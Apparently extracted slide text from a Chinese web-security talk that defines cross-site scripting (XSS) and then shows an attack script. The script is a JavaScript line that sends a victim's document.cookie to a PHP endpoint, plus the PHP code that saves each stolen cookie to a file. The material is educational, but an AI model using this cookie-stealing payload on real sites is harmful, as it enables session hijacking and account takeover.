安全那些事儿
- 15. XSS 不像 CSS 那么优美
跨站脚本攻击( Cross-site scripting ,通常简称为 XSS )是
一种网站应用程式的安全漏洞攻击,允许恶意使用者将程式码
注入到网页上,其他使用者在观看网页时就会受到影响。
- 21. 构建“传说中的”攻击脚本
客户端( Javascript )
var img = new Image();
img.src = 'get_cookie.php?var='+encodeURI(document.cookie);
服务器端( PHP )
<?php
if (isset($_GET['var'])) {
file_put_contents('./cookie/'.time().'.txt',
urldecode($_GET['var']));
}